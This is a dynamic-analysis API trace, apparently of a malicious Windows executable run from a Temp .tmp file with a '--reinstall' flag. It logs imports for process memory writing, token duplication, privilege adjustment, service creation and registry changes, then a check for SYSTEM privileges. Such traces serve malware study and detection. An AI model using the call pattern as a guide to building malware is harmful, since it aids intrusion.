	[0086.000] GetProcAddress (hModule=0x765a0000, lpProcName="IsBadReadPtr") returned 0x765b2510
	[0086.000] GetProcAddress (hModule=0x765a0000, lpProcName="GetCommandLineW") returned 0x765baba0
	[0086.000] GetProcAddress (hModule=0x765a0000, lpProcName="CreateMutexW") returned 0x765c66f0
	[0086.000] GetProcAddress (hModule=0x765a0000, lpProcName="CreateToolhelp32Snapshot") returned 0x765c7b50
	[0086.000] GetProcAddress (hModule=0x765a0000, lpProcName="Process32NextW") returned 0x765bd290
	[0086.001] GetProcAddress (hModule=0x765a0000, lpProcName="Process32FirstW") returned 0x765bf5a0
	[0086.001] GetProcAddress (hModule=0x765a0000, lpProcName="GetExitCodeThread") returned 0x765c4f40
	[0086.001] GetProcAddress (hModule=0x765a0000, lpProcName="WriteProcessMemory") returned 0x765e2850
	[0086.001] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalMemoryStatusEx") returned 0x765bafe0
	[0086.001] GetProcAddress (hModule=0x765a0000, lpProcName="OpenMutexW") returned 0x765c6770
	[0086.001] GetProcAddress (hModule=0x765a0000, lpProcName="MultiByteToWideChar") returned 0x765b2ad0
	[0086.001] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersionExW") returned 0x765baa80
	[0086.001] GetProcAddress (hModule=0x765a0000, lpProcName="FormatMessageA") returned 0x765bf830
	[0086.001] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpiA") returned 0x765b7830
	[0086.001] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileAttributesW") returned 0x765c6a50
	[0086.002] GetProcAddress (hModule=0x765a0000, lpProcName="MoveFileExW") returned 0x765bb2b0
	[0086.002] GetProcAddress (hModule=0x765a0000, lpProcName="CopyFileW") returned 0x765c6ec0
	[0086.002] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpW") returned 0x765b7970
	[0086.002] GetProcAddress (hModule=0x765a0000, lpProcName="lstrlenW") returned 0x765b3690
	[0086.002] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableA") returned 0x765e22f0
	[0086.002] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemInfo") returned 0x765ba0f0
	[0086.002] GetProcAddress (hModule=0x765a0000, lpProcName="TerminateThread") returned 0x765c0160
	[0086.002] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableA") returned 0x765ba8a0
	[0086.003] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileTime") returned 0x765c6a90
	[0086.003] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemTime") returned 0x765c4940
	[0086.003] GetProcAddress (hModule=0x765a0000, lpProcName="SystemTimeToFileTime") returned 0x765c4c10
	[0086.003] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileSize") returned 0x765c6a70
	[0086.003] GetProcAddress (hModule=0x765a0000, lpProcName="DeleteFileW") returned 0x765c68c0
	[0086.003] GetProcAddress (hModule=0x765a0000, lpProcName="FindClose") returned 0x765c68e0
	[0086.003] GetProcAddress (hModule=0x765a0000, lpProcName="SetEndOfFile") returned 0x765c6c00
	[0086.003] GetProcAddress (hModule=0x765a0000, lpProcName="SetFilePointer") returned 0x765c6c40
	[0086.003] GetProcAddress (hModule=0x765a0000, lpProcName="SetFileTime") returned 0x765c6c60
	[0086.004] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualProtect") returned 0x765b7a50
	[0086.004] GetProcAddress (hModule=0x765a0000, lpProcName="HeapFree") returned 0x765b1ba0
	[0086.004] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcess") returned 0x765b38c0
	[0086.004] GetProcAddress (hModule=0x765a0000, lpProcName="ExpandEnvironmentStringsW") returned 0x765bcd50
	[0086.004] GetProcAddress (hModule=0x765a0000, lpProcName="TerminateProcess") returned 0x765c5100
	[0086.004] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForMultipleObjects") returned 0x765c6800
	[0086.004] GetProcAddress (hModule=0x765a0000, lpProcName="DeleteAtom") returned 0x765bcb20
	[0086.004] GetProcAddress (hModule=0x765a0000, lpProcName="lstrlenA") returned 0x765b8c80
	[0086.004] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForSingleObject") returned 0x765c6820
	[0086.005] GetProcAddress (hModule=0x765a0000, lpProcName="ExitThread") returned 0x779c7a80
	[0086.005] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleA") returned 0x765b99f0
	[0086.005] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalAddAtomW") returned 0x765b1be0
	[0086.005] GetProcAddress (hModule=0x765a0000, lpProcName="OpenProcess") returned 0x765b8bf0
	[0086.005] GetProcAddress (hModule=0x765a0000, lpProcName="ProcessIdToSessionId") returned 0x765b8fa0
	[0086.005] GetProcAddress (hModule=0x765a0000, lpProcName="Sleep") returned 0x765b7990
	[0086.005] GetProcAddress (hModule=0x765a0000, lpProcName="GetLastError") returned 0x765b3870
	[0086.005] GetProcAddress (hModule=0x765a0000, lpProcName="LoadLibraryA") returned 0x765c4bf0
	[0086.005] GetProcAddress (hModule=0x765a0000, lpProcName="CloseHandle") returned 0x765c6630
	[0086.006] GetProcAddress (hModule=0x765a0000, lpProcName="CreateThread") returned 0x765b9b90
	[0086.006] GetProcAddress (hModule=0x765a0000, lpProcName="HeapAlloc") returned 0x77992bd0
	[0086.006] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcAddress") returned 0x765b78b0
	[0086.006] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomW") returned 0x765b20f0
	[0086.006] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcessId") returned 0x765b23e0
	[0086.006] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessHeap") returned 0x765b7710
	[0086.006] GetProcAddress (hModule=0x765a0000, lpProcName="CreateProcessW") returned 0x765bb000
	[0086.006] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleW") returned 0x765b9bc0
	[0086.006] GetProcAddress (hModule=0x765a0000, lpProcName="FreeLibrary") returned 0x765b9f50
	[0086.007] GetProcAddress (hModule=0x765a0000, lpProcName="GetExitCodeProcess") returned 0x765bfdb0
	[0086.007] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemDirectoryW") returned 0x765b9fd0
	[0086.007] GetProcAddress (hModule=0x765a0000, lpProcName="OutputDebugStringA") returned 0x765bfde0
	[0086.007] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcpyA") returned 0x765bea30
	[0086.007] GetProcAddress (hModule=0x765a0000, lpProcName="ExitProcess") returned 0x765c7b30
	[0086.007] GetProcAddress (hModule=0x765a0000, lpProcName="SetProcessPriorityBoost") returned 0x765bfef0
	[0086.007] GetProcAddress (hModule=0x765a0000, lpProcName="SetPriorityClass") returned 0x765b9e90
	[0086.007] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleFileNameW") returned 0x765b9b00
	[0086.007] GetProcAddress (hModule=0x765a0000, lpProcName="SetThreadPriority") returned 0x765b9990
	[0086.007] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableW") returned 0x765b9970
	[0086.008] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentThread") returned 0x765b75f0
	[0086.008] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcatW") returned 0x765dd170
	[0086.008] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalAlloc") returned 0x765b9950
	[0086.008] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFree") returned 0x765bccf0
	[0086.008] GetProcAddress (hModule=0x765a0000, lpProcName="LocalFree") returned 0x765b79a0
	[0086.008] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcpyW") returned 0x765dd260
	[0086.008] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpA") returned 0x765bcc30
	[0086.008] GetProcAddress (hModule=0x765a0000, lpProcName="ReadFile") returned 0x765c6bb0
	[0086.008] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableW") returned 0x765be9e0
	[0086.009] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempPathW") returned 0x765c6b30
	[0086.009] GetProcAddress (hModule=0x765a0000, lpProcName="CreateFileW") returned 0x765c6890
	[0086.009] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempFileNameW") returned 0x765c6b10
	[0086.009] GetProcAddress (hModule=0x765a0000, lpProcName="LocalAlloc") returned 0x765b7a30
	[0086.009] GetProcAddress (hModule=0x765a0000, lpProcName="HeapReAlloc") returned 0x7798efe0
	[0086.009] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualFree") returned 0x765b7600
	[0086.009] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualAlloc") returned 0x765b7810
	[0086.009] GetProcAddress (hModule=0x765a0000, lpProcName="RemoveDirectoryW") returned 0x765c6bf0
	[0086.009] GetProcAddress (hModule=0x765a0000, lpProcName="WriteFile") returned 0x765c6ca0
	[0086.010] GetProcAddress (hModule=0x765a0000, lpProcName="DuplicateHandle") returned 0x765c6640
	[0086.010] GetProcAddress (hModule=0x765a0000, lpProcName="DisconnectNamedPipe") returned 0x765e0990
	[0086.010] GetProcAddress (hModule=0x765a0000, lpProcName="FlushFileBuffers") returned 0x765c69b0
	[0086.010] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersion") returned 0x765baaf0
	[0086.010] GetProcAddress (hModule=0x765a0000, lpProcName="CreateEventW") returned 0x765c66b0
	[0086.010] GetProcAddress (hModule=0x765a0000, lpProcName="GetComputerNameW") returned 0x765c46a0
	[0086.010] GetProcAddress (hModule=0x765a0000, lpProcName="WideCharToMultiByte") returned 0x765b3880
	[0086.010] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount") returned 0x765c5eb0
	[0086.011] GetProcAddress (hModule=0x765a0000, lpProcName="GetComputerNameA") returned 0x765bfbf0
	[0086.011] GetProcAddress (hModule=0x765a0000, lpProcName="GetShortPathNameW") returned 0x765b2b90
	[0086.011] GetProcAddress (hModule=0x765a0000, lpProcName="FindFirstFileW") returned 0x765c6960
	[0086.011] GetProcAddress (hModule=0x765a0000, lpProcName="FindNextFileW") returned 0x765c69a0
	[0086.011] VirtualProtect (in: lpAddress=0x4230c8, dwSize=0x198, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0086.011] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x77810000
	[0086.011] VirtualProtect (in: lpAddress=0x4232b8, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0086.011] GetProcAddress (hModule=0x77810000, lpProcName="wsprintfW") returned 0x7783f890
	[0086.011] GetProcAddress (hModule=0x77810000, lpProcName="wsprintfA") returned 0x778404a0
	[0086.011] GetProcAddress (hModule=0x77810000, lpProcName="ExitWindowsEx") returned 0x77879430
	[0086.011] GetProcAddress (hModule=0x77810000, lpProcName="GetShellWindow") returned 0x7782ff50
	[0086.012] GetProcAddress (hModule=0x77810000, lpProcName="GetForegroundWindow") returned 0x77848cb0
	[0086.012] GetProcAddress (hModule=0x77810000, lpProcName="TranslateMessage") returned 0x7782d9b0
	[0086.012] GetProcAddress (hModule=0x77810000, lpProcName="GetWindowThreadProcessId") returned 0x7782da50
	[0086.012] VirtualProtect (in: lpAddress=0x4232b8, dwSize=0x20, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0086.012] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x74aa0000
	[0086.012] VirtualProtect (in: lpAddress=0x423000, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0086.012] GetProcAddress (hModule=0x74aa0000, lpProcName="GetUserNameA") returned 0x74ac2910
	[0086.012] GetProcAddress (hModule=0x74aa0000, lpProcName="LookupAccountSidW") returned 0x74abf590
	[0086.012] GetProcAddress (hModule=0x74aa0000, lpProcName="DuplicateTokenEx") returned 0x74ac0ad0
	[0086.012] GetProcAddress (hModule=0x74aa0000, lpProcName="GetLengthSid") returned 0x74abf570
	[0086.013] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateProcessAsUserW") returned 0x74ac2c10
	[0086.013] GetProcAddress (hModule=0x74aa0000, lpProcName="FreeSid") returned 0x74ac0440
	[0086.013] GetProcAddress (hModule=0x74aa0000, lpProcName="OpenProcessToken") returned 0x74abf520
	[0086.013] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExA") returned 0x74ac0a20
	[0086.013] GetProcAddress (hModule=0x74aa0000, lpProcName="AllocateAndInitializeSid") returned 0x74abf660
	[0086.013] GetProcAddress (hModule=0x74aa0000, lpProcName="SetTokenInformation") returned 0x74ac3840
	[0086.013] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyA") returned 0x74ac09d0
	[0086.013] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCloseKey") returned 0x74abf620
	[0086.013] GetProcAddress (hModule=0x74aa0000, lpProcName="ConvertSidToStringSidW") returned 0x74abf060
	[0086.014] GetProcAddress (hModule=0x74aa0000, lpProcName="LookupPrivilegeValueA") returned 0x74ad4dc0
	[0086.014] GetProcAddress (hModule=0x74aa0000, lpProcName="AdjustTokenPrivileges") returned 0x74ac0980
	[0086.014] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExW") returned 0x74abf330
	[0086.014] GetProcAddress (hModule=0x74aa0000, lpProcName="RegDeleteValueW") returned 0x74ac0fb0
	[0086.014] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExW") returned 0x74abf350
	[0086.014] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeAcl") returned 0x74abfa80
	[0086.014] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeSecurityDescriptor") returned 0x74abfc00
	[0086.014] GetProcAddress (hModule=0x74aa0000, lpProcName="AddAce") returned 0x74ac1ee0
	[0086.014] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExW") returned 0x74abf7f0
	[0086.015] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetKeySecurity") returned 0x74ad7830
	[0086.015] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyExW") returned 0x74abfa20
	[0086.015] GetProcAddress (hModule=0x74aa0000, lpProcName="GetAce") returned 0x74ac2550
	[0086.015] GetProcAddress (hModule=0x74aa0000, lpProcName="GetAclInformation") returned 0x74ac2570
	[0086.015] GetProcAddress (hModule=0x74aa0000, lpProcName="RegGetKeySecurity") returned 0x74ac4190
	[0086.015] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSecurityDescriptorDacl") returned 0x74abfc50
	[0086.015] GetProcAddress (hModule=0x74aa0000, lpProcName="SetSecurityDescriptorDacl") returned 0x74abf830
	[0086.015] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExA") returned 0x74abf790
	[0086.066] GetProcAddress (hModule=0x74aa0000, lpProcName="CheckTokenMembership") returned 0x74abfb50
	[0086.066] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateWellKnownSid") returned 0x74ac0af0
	[0086.066] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSidSubAuthority") returned 0x74ac0ab0
	[0086.066] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSidSubAuthorityCount") returned 0x74ac0eb0
	[0086.066] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExA") returned 0x74abf500
	[0086.066] GetProcAddress (hModule=0x74aa0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x74ac3ba0
	[0086.067] GetProcAddress (hModule=0x74aa0000, lpProcName="SetEntriesInAclW") returned 0x74ac2bf0
	[0086.067] GetProcAddress (hModule=0x74aa0000, lpProcName="SetFileSecurityW") returned 0x74ac41d0
	[0086.067] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyW") returned 0x74abfaa0
	[0086.067] GetProcAddress (hModule=0x74aa0000, lpProcName="GetUserNameW") returned 0x74ac1030
	[0086.067] GetProcAddress (hModule=0x74aa0000, lpProcName="StartServiceW") returned 0x74ac4210
	[0086.067] GetProcAddress (hModule=0x74aa0000, lpProcName="OpenSCManagerW") returned 0x74ac0ed0
	[0086.067] GetProcAddress (hModule=0x74aa0000, lpProcName="CloseServiceHandle") returned 0x74ac0960
	[0086.067] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateServiceW") returned 0x74ad65d0
	[0086.067] GetProcAddress (hModule=0x74aa0000, lpProcName="SetServiceStatus") returned 0x74ac0fd0
	[0086.068] GetProcAddress (hModule=0x74aa0000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x74ac12f0
	[0086.068] GetProcAddress (hModule=0x74aa0000, lpProcName="StartServiceCtrlDispatcherW") returned 0x74ac12b0
	[0086.068] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyA") returned 0x74ac2500
	[0086.068] GetProcAddress (hModule=0x74aa0000, lpProcName="GetTokenInformation") returned 0x74abf370
	[0086.068] VirtualProtect (in: lpAddress=0x423000, dwSize=0xc8, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0086.068] GetModuleHandleA (lpModuleName="Secur32.dll") returned 0x0
	[0086.068] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x6ff60000
	[0086.070] VirtualProtect (in: lpAddress=0x4232b0, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0086.070] GetProcAddress (hModule=0x6ff60000, lpProcName="GetUserNameExW") returned 0x7469c5f0
	[0086.070] VirtualProtect (in: lpAddress=0x4232b0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0086.070] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x75120000
	[0086.070] VirtualProtect (in: lpAddress=0x423274, dwSize=0x10, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0086.070] GetProcAddress (hModule=0x75120000, lpProcName="ShellExecuteExW") returned 0x752be690
	[0086.070] GetProcAddress (hModule=0x75120000, lpProcName=0x2a8) returned 0x753cdb90
	[0086.071] GetProcAddress (hModule=0x75120000, lpProcName="SHChangeNotify") returned 0x7527cd10
	[0086.071] VirtualProtect (in: lpAddress=0x423274, dwSize=0x10, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0086.071] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x771d0000
	[0086.071] VirtualProtect (in: lpAddress=0x42337c, dwSize=0x18, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0086.071] GetProcAddress (hModule=0x771d0000, lpProcName="CoTaskMemFree") returned 0x748d9170
	[0086.071] GetProcAddress (hModule=0x771d0000, lpProcName="CoCreateInstance") returned 0x74900060
	[0086.071] GetProcAddress (hModule=0x771d0000, lpProcName="CoInitialize") returned 0x77201930
	[0086.071] GetProcAddress (hModule=0x771d0000, lpProcName="CoUninitialize") returned 0x748d92a0
	[0086.071] GetProcAddress (hModule=0x771d0000, lpProcName="CoInitializeEx") returned 0x748d88d0
	[0086.071] VirtualProtect (in: lpAddress=0x42337c, dwSize=0x18, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0086.071] VirtualFree (lpAddress=0x2000000, dwSize=0x32e00, dwFreeType=0x4000) returned 1
	[0086.072] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0086.072] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x413e60, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec
	[0086.075] CloseHandle (hObject=0x1ec) returned 1
	[0086.075] GetCurrentProcess () returned 0xffffffff
	[0086.075] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0xffffffff) 

Thread:
	id = 81
	os_tid = 0xe64


Thread:
	id = 82
	os_tid = 0xe5c


Thread:
	id = 87
	os_tid = 0x928

	[0086.125] GetModuleHandleA (lpModuleName="kernel32") returned 0x765a0000
	[0086.125] GetProcAddress (hModule=0x765a0000, lpProcName="SetErrorMode") returned 0x765b8d20
	[0086.125] SetErrorMode (uMode=0x0) returned 0x0
	[0086.125] SetErrorMode (uMode=0x2) returned 0x0
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.125] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.126] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.127] GetLastError () returned 0x57
	[0086.128] GetLastError () returned 0x57
	[0086.128] GetLastError () returned 0x57
	[0086.128] GetLastError () returned 0x57
	[0086.128] GetLastError () returned 0x57
	[0086.128] GetLastError () returned 0x57
	[0086.128] GetLastError () returned 0x57
	[0086.128] GetLastError () returned 0x57
	[0086.128] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75120000
	[0086.128] GetProcAddress (hModule=0x75120000, lpProcName="CommandLineToArgvW") returned 0x752cbf80
	[0086.128] GetCommandLineW () returned="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" --reinstall"
	[0086.128] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" --reinstall", pNumArgs=0x217fdec | out: pNumArgs=0x217fdec) returned 0x7f0060*="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp"
	[0086.128] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ffbc8, nSize=0x104 | out: lpFilename="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\tmp8c77.tmp")) returned 0x30
	[0086.128] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0086.128] GetCurrentProcess () returned 0xffffffff
	[0086.128] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x217fdbc | out: TokenHandle=0x217fdbc*=0x1ec) returned 1
	[0086.128] GetTokenInformation (in: TokenHandle=0x1ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x217fdc8 | out: TokenInformation=0x0, ReturnLength=0x217fdc8) returned 0
	[0086.129] GetLastError () returned 0x7a
	[0086.129] GetTokenInformation (in: TokenHandle=0x1ec, TokenInformationClass=0x1, TokenInformation=0x7fe620, TokenInformationLength=0x24, ReturnLength=0x217fdc8 | out: TokenInformation=0x7fe620, ReturnLength=0x217fdc8) returned 1
	[0086.129] ConvertSidToStringSidW () returned 0x1
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] GetLastError () returned 0x0
	[0086.129] StrCmpIW (psz1="S-1-5-18", psz2="S-1-5-21-2172869166-1497266965-2109836178-1000") returned -1
